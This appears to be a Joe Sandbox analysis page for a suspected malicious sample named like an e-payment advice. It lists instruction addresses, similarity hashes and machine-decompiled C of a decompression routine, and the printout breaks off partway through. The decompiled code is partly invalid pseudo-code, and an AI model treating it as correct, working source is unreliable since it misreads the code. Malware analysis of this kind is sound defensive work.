0x00406cef
0x00406cf2
0x00406cf5
0x00406cf8
0x00406cff
0x00406c43
0x00406c43
0x00406c46
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00406cde
0x00000000
0x00000000
0x00406a14
0x00406a16
0x00406a1d
0x00406a1e
0x00406a20
0x00406a23
0x00000000
0x00000000
0x00406a2b
0x00406a2e
0x00406a31
0x00406a33
0x00406a35
0x00406a35
0x00406a36
0x00406a39
0x00406a40
0x00406a43
0x00406a51
0x00000000
0x00000000
0x00406d27
0x00406d27
0x00406d2a
0x00406d31
0x00000000
0x00000000
0x00406d36
0x00406d36
0x00406d3a
0x00406e72
0x00000000
0x00406e72
0x00406d40
0x00406d43
0x00406d46
0x00406d4a
0x00406d4d
0x00406d53
0x00406d55
0x00406d55
0x00406d55
0x00406d58
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5e
0x00406d5e
0x00406d62
0x00406dc2
0x00406dc5
0x00406dca
0x00406dcb
0x00406dcd
0x00406dcf
0x00406dd2
0x00406cde
0x00406cde
0x00000000
0x00406ce4
0x00406cde
0x00406d64
0x00406d6a
0x00406d6d
0x00406d70
0x00406d73
0x00406d76
0x00406d79
0x00406d7c
0x00406d7f
0x00406d82
0x00406d85
0x00406d9e
0x00406da1
0x00406da4
0x00406da7
0x00406dab
0x00406dad
0x00406dad
0x00406dae
0x00406db1
0x00406d87
0x00406d87
0x00406d8f
0x00406d94
0x00406d96
0x00406d99
0x00406d99
0x00406db4
0x00406dbb
0x00000000
0x00406dbd
0x00000000
0x00406dbd
0x00000000
0x00406a59
0x00406a5c
0x00406a92
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc5
0x00406bc5
0x00406bc8
0x00406bca
0x00406e54
0x00000000
0x00406e54
0x00406bd0
0x00406bd3
0x00000000
0x00000000
0x00406bd9
0x00406bdd
0x00406be0
0x00406be0
0x00406be0
0x00000000
0x00406be0
0x00406a5e
0x00406a60
0x00406a62
0x00406a64
0x00406a67
0x00406a68
0x00406a6a
0x00406a6c
0x00406a6f
0x00406a72
0x00406a88
0x00406a8d
0x00406ac5
0x00406ac5
0x00406ac9
0x00406af5
0x00406af7
0x00406afe
0x00406b01
0x00406b04
0x00406b04
0x00406b09
0x00406b09
0x00406b0b
0x00406b0e
0x00406b15
0x00406b18
0x00406b45
0x00406b45
0x00406b48
0x00406b4b
0x00406bbf
0x00406bbf
0x00406bbf
0x00000000
0x00406bbf
0x00406b4d
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b65
0x00406b68
0x00406b6b
0x00406b6e
0x00406b87
0x00406b89
0x00406b8c
0x00406b8d
0x00406b90
0x00406b92
0x00406b95
0x00406b97
0x00406b99
0x00406b9c
0x00406b9e
0x00406ba1
0x00406ba5
0x00406ba7
0x00406ba7
0x00406ba8
0x00406bab
0x00406bae
0x00406b70
0x00406b70
0x00406b78
0x00406b7d
0x00406b7f
0x00406b82
0x00406b82
0x00406bb1
0x00406bb8
0x00406b42
0x00406b42
0x00406b42
0x00406b42
0x00000000
0x00406bba
0x00000000
0x00406bba
0x00406bb8
0x00406acb
0x00406ace
0x00406ad0
0x00406ad3
0x00406ad6
0x00406ad9
0x00406adb
0x00406ade
0x00406ae1
0x00406ae1
0x00406ae4
0x00406ae4
0x00406ae7
0x00406aee
0x00406ac2
0x00406ac2
0x00406ac2
0x00406ac2
0x00000000
0x00406af0
0x00000000
0x00406af0
0x00406aee
0x00406a74
0x00406a77
0x00406a79
0x00406a7c
0x00000000
0x00000000
0x004067db
0x004067db
0x004067df
0x00406e24
0x00000000
0x00406e24
0x004067e5
0x004067e8
0x004067eb
0x004067ee
0x004067f1
0x004067f4
0x004067f7
0x004067f9
0x004067fc
0x004067ff
0x00406802
0x00406804
0x00406804
0x00406804
0x00000000
0x00000000
0x00406966
0x00406966
0x0040696a
0x00406e30
0x00000000
0x00406e30
0x00406970
0x00406973
0x00406976
0x00406979
0x0040697b
0x0040697b
0x0040697b
0x0040697e
0x00406981
0x00406984
0x00406987
0x0040698a
0x0040698d
0x0040698e
0x00406990
0x00406990
0x00406990
0x00406993
0x00406996
0x00406999
0x0040699c
0x0040699c
0x0040699c
0x0040699f
0x004069a1
0x004069a1
0x00000000
0x00000000
0x00406be3
0x00406be3
0x00406be3
0x00406be7
0x00000000
0x00000000
0x00406bed
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf8
0x00406bf8
0x00406bf8
0x00406bfb
0x00406bfe
0x00406c01
0x00406c04
0x00406c07
0x00406c0a
0x00406c0b
0x00406c0d
0x00406c0d
0x00406c0d
0x00406c10
0x00406c13
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c22
0x00406c25
0x00000000
0x00406c27
0x004069a4
0x004069a4
0x00000000
0x004069a4
0x00406c25
0x00406e5a
0x00000000
0x00000000
0x00406489
0x00406e91
0x00406e91
0x00000000
0x00406e91
0x00406cde
0x00406c65
0x00406c62
0x00000000
0x00406899

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7de7d62d5bd7f5964df27a39736f706d5b0cb98cf3e46e90e0dfc1ab4ed8f1c
Instruction ID: 803a34037b0f7f5be0b8e0f61a876c36f0b5510bb0b2ab0f73e67388892f039f
Opcode Fuzzy Hash: f7de7d62d5bd7f5964df27a39736f706d5b0cb98cf3e46e90e0dfc1ab4ed8f1c
Instruction Fuzzy Hash: 95710471D04229DBDF24CFA8C8447ADBBB1FB44305F15806AD846BB281D7385A96DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004069B3 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004069B3() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406E99))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
